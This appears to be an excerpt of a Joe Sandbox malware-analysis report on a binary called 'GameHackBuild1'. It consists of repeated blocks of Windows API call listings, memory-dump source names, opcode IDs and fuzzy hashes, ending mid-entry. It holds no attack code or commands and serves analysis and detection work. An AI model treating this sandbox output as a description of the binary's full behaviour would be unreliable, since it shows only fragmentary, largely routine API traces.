                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: f75fa285935c693045187447f2a6f123740467984baafc49966c4f88e7d12d73
                                      • Instruction ID: 8d6167476a1d5a39d9ee78aa28ec44e94439a26bac86ea28140546c7f4620826
                                      • Opcode Fuzzy Hash: f75fa285935c693045187447f2a6f123740467984baafc49966c4f88e7d12d73
                                      • Instruction Fuzzy Hash: 52A001A62BD102BC7108B252AE26DBB026DD8C5BA17348E1AB50A98089A994598A5831
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DAB2
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 788e6912ee4d0941044e676f6d188450aafd55dc489271f8ae1550ffe9db893b
                                      • Instruction ID: 8d6167476a1d5a39d9ee78aa28ec44e94439a26bac86ea28140546c7f4620826
                                      • Opcode Fuzzy Hash: 788e6912ee4d0941044e676f6d188450aafd55dc489271f8ae1550ffe9db893b
                                      • Instruction Fuzzy Hash: 52A001A62BD102BC7108B252AE26DBB026DD8C5BA17348E1AB50A98089A994598A5831
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DAB2
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 2a1fa674a91dec0e90ab77e960eb6c88f086224da595ada29479323f03532090
                                      • Instruction ID: 8d6167476a1d5a39d9ee78aa28ec44e94439a26bac86ea28140546c7f4620826
                                      • Opcode Fuzzy Hash: 2a1fa674a91dec0e90ab77e960eb6c88f086224da595ada29479323f03532090
                                      • Instruction Fuzzy Hash: 52A001A62BD102BC7108B252AE26DBB026DD8C5BA17348E1AB50A98089A994598A5831
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DAB2
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: bdfcdbc073796fed75db332c21837a017d011e7d4e27753df4922e9a7f76e74b
                                      • Instruction ID: 8d6167476a1d5a39d9ee78aa28ec44e94439a26bac86ea28140546c7f4620826
                                      • Opcode Fuzzy Hash: bdfcdbc073796fed75db332c21837a017d011e7d4e27753df4922e9a7f76e74b
                                      • Instruction Fuzzy Hash: 52A001A62BD102BC7108B252AE26DBB026DD8C5BA17348E1AB50A98089A994598A5831
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DAB2
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: bcd862ecd31eaa7c7f27eb66b3b7a1eda9f10a4f57c626ebfcbd7742aae180e3
                                      • Instruction ID: 8d6167476a1d5a39d9ee78aa28ec44e94439a26bac86ea28140546c7f4620826
                                      • Opcode Fuzzy Hash: bcd862ecd31eaa7c7f27eb66b3b7a1eda9f10a4f57c626ebfcbd7742aae180e3
                                      • Instruction Fuzzy Hash: 52A001A62BD102BC7108B252AE26DBB026DD8C5BA17348E1AB50A98089A994598A5831
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DBD5
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: a8ecbd385f85527cab6df1569f680b420e7089925648e5b826804cdebe7fabc2
                                      • Instruction ID: 0ca0965ee7124b72badc543def3459e70e8b6616ab6aa40c85a4ec7f589d30c5
                                      • Opcode Fuzzy Hash: a8ecbd385f85527cab6df1569f680b420e7089925648e5b826804cdebe7fabc2
                                      • Instruction Fuzzy Hash: 49A001AA2BD106BC710862596E1BDFA022DE4C5BA17318D1AB60B94081AA905D8A5431
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DBD5
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: cc59e51ff3eba28372a68b9c69b45577b710fce505498b44802b8519685986d2
                                      • Instruction ID: 0ca0965ee7124b72badc543def3459e70e8b6616ab6aa40c85a4ec7f589d30c5
                                      • Opcode Fuzzy Hash: cc59e51ff3eba28372a68b9c69b45577b710fce505498b44802b8519685986d2
                                      • Instruction Fuzzy Hash: 49A001AA2BD106BC710862596E1BDFA022DE4C5BA17318D1AB60B94081AA905D8A5431
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DBD5
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: cfdd506c85ab079e3a13108a9bf3dbf87f974567f4ca9b29eddf0316e3290390
                                      • Instruction ID: 0ca0965ee7124b72badc543def3459e70e8b6616ab6aa40c85a4ec7f589d30c5
                                      • Opcode Fuzzy Hash: cfdd506c85ab079e3a13108a9bf3dbf87f974567f4ca9b29eddf0316e3290390
                                      • Instruction Fuzzy Hash: 49A001AA2BD106BC710862596E1BDFA022DE4C5BA17318D1AB60B94081AA905D8A5431
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DBD5
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: aa7ee4b3cf7b22c8a7653c82594dc2c5d4fd62f2f8ab11dc0ec7cee324fecbd0
                                      • Instruction ID: 0ca0965ee7124b72badc543def3459e70e8b6616ab6aa40c85a4ec7f589d30c5
                                      • Opcode Fuzzy Hash: aa7ee4b3cf7b22c8a7653c82594dc2c5d4fd62f2f8ab11dc0ec7cee324fecbd0
                                      • Instruction Fuzzy Hash: 49A001AA2BD106BC710862596E1BDFA022DE4C5BA17318D1AB60B94081AA905D8A5431
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DC36
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 6aafb6ed28c9f59b2222bcdb55c810579ad1a8472d93531df599c7bb96f29f40
                                      • Instruction ID: 5c4fd7f4a66127c6f3210b5feca7babde4cdf4f818420542d52662db57a841cc
                                      • Opcode Fuzzy Hash: 6aafb6ed28c9f59b2222bcdb55c810579ad1a8472d93531df599c7bb96f29f40
                                      • Instruction Fuzzy Hash: 87A001BA6BD202BCB14C62656E16EBA022DD4C5B617308D1AB60AA4091AA806D8A9871
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DC36
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: b89c3f219f9e99434245f81c4582d2e8252e2494e3d3c62131f0452bd08c9f59
                                      • Instruction ID: 5c4fd7f4a66127c6f3210b5feca7babde4cdf4f818420542d52662db57a841cc
                                      • Opcode Fuzzy Hash: b89c3f219f9e99434245f81c4582d2e8252e2494e3d3c62131f0452bd08c9f59
                                      • Instruction Fuzzy Hash: 87A001BA6BD202BCB14C62656E16EBA022DD4C5B617308D1AB60AA4091AA806D8A9871
                                      APIs
                                      • SetEndOfFile.KERNELBASE(?,00A09104,?,?,-00001964), ref: 00A09EC2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: File
                                      • String ID:
                                      • API String ID: 749574446-0
                                      • Opcode ID: a62a02537bdd2b6e53cc6e17889d8906716a05797fff6d079f55e7e861df4207
                                      • Instruction ID: d6ee877380d48f1b8e5521ee376731b6c1b1e314a6c0465af932c4cc35db8bea
                                      • Opcode Fuzzy Hash: a62a02537bdd2b6e53cc6e17889d8906716a05797fff6d079f55e7e861df4207
                                      • Instruction Fuzzy Hash: 96B011320AA00A8A8E002B30CE088283A20EA2230A30082A0B002CA0A0CB22C003AA00
                                      APIs
                                      • SetCurrentDirectoryW.KERNELBASE(?,00A1A587,C:\Users\user\Desktop,00000000,00A4946A,00000006), ref: 00A1A326
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory
                                      • String ID:
                                      • API String ID: 1611563598-0
                                      • Opcode ID: 296fcf20f9a0f02a345ab7693a16727f0fbdd7bc27f510b06d1457c934804ac5
                                      • Instruction ID: 457fe42abedc1826c9b0e7db48abce9c018f49138294111c1656f534ea56a2c5
                                      • Opcode Fuzzy Hash: 296fcf20f9a0f02a345ab7693a16727f0fbdd7bc27f510b06d1457c934804ac5
                                      • Instruction Fuzzy Hash: 2AA01231198006568E004B30CC09C1576505760703F0087207002C00A0CB308814A500
                                      APIs
                                      • CloseHandle.KERNELBASE(000000FF,?,?,00A0968F,?,?,?,?,00A31FA1,000000FF), ref: 00A096EB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: CloseHandle
                                      • String ID:
                                      • API String ID: 2962429428-0
                                      • Opcode ID: 3fc09bd321222fcf2b4ca95bad54087eddac1e80eb7b56a0c19bdb17f11bc376
                                      • Instruction ID: a063fbbf4c725db6c6782e4d04ba4dc2931844f80f3a0fae426a300222f6d049
                                      • Opcode Fuzzy Hash: 3fc09bd321222fcf2b4ca95bad54087eddac1e80eb7b56a0c19bdb17f11bc376
                                      • Instruction Fuzzy Hash: 41F05E31556B188FDB308B24EAA8793B7E49B12725F048B1E91EB434E1A766685D9B00
                                      APIs
                                        • Part of subcall function 00A0130B: GetDlgItem.USER32(00000000,00003021), ref: 00A0134F
                                        • Part of subcall function 00A0130B: SetWindowTextW.USER32(00000000,00A335B4), ref: 00A01365
                                      • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00A1B971
                                      • EndDialog.USER32(?,00000006), ref: 00A1B984
                                      • GetDlgItem.USER32(?,0000006C), ref: 00A1B9A0
                                      • SetFocus.USER32(00000000), ref: 00A1B9A7
                                      • SetDlgItemTextW.USER32(?,00000065,?), ref: 00A1B9E1
                                      • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00A1BA18
                                      • FindFirstFileW.KERNEL32(?,?), ref: 00A1BA2E
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A1BA4C
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A1BA5C
                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00A1BA78
                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00A1BA94
                                      • _swprintf.LIBCMT ref: 00A1BAC4
                                        • Part of subcall function 00A0400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A0401D
                                      • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00A1BAD7
                                      • FindClose.KERNEL32(00000000), ref: 00A1BADE
                                      • _swprintf.LIBCMT ref: 00A1BB37
                                      • SetDlgItemTextW.USER32(?,00000068,?), ref: 00A1BB4A
                                      • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00A1BB67
                                      • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00A1BB87
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A1BB97
                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00A1BBB1
                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00A1BBC9
                                      • _swprintf.LIBCMT ref: 00A1BBF5
                                      • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00A1BC08
                                      • _swprintf.LIBCMT ref: 00A1BC5C
                                      • SetDlgItemTextW.USER32(?,00000069,?), ref: 00A1BC6F
                                        • Part of subcall function 00A1A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00A1A662
                                        • Part of subcall function 00A1A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,00A3E600,?,?), ref: 00A1A6B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                      • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                      • API String ID: 797121971-1840816070
                                      • Opcode ID: 68c1d419ab0c5d74d3964e4f000b56808e56e3cae66c27254c88e634790bfb9e
                                      • Instruction ID: 7637831d1236428b5ccb6b0e1dd8ea1b2f9cc15fe4c46a1d4271bbe226743ede
                                      • Opcode Fuzzy Hash: 68c1d419ab0c5d74d3964e4f000b56808e56e3cae66c27254c88e634790bfb9e
                                      • Instruction Fuzzy Hash: 1B9183B2248348BFD621DBA0DD49FFBB7ACEB4A700F040919F749D2091D775AA468772
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00A07191
                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 00A072F1
                                      • CloseHandle.KERNEL32(00000000), ref: 00A07301
                                        • Part of subcall function 00A07BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00A07C04
                                        • Part of subcall function 00A07BF5: GetLastError.KERNEL32 ref: 00A07C4A
                                        • Part of subcall function 00A07BF5: CloseHandle.KERNEL32(?), ref: 00A07C59
                                      • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00A0730C
                                      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00A0741A
                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00A07446
                                      • CloseHandle.KERNEL32(?), ref: 00A07457
                                      • GetLastError.KERNEL32(00000015,00000000,?), ref: 00A07467
                                      • RemoveDirectoryW.KERNEL32(?), ref: 00A074B3
                                      • DeleteFileW.KERNEL32(?), ref: 00A074DB
                                      Strings
                                      Memory Dump Source
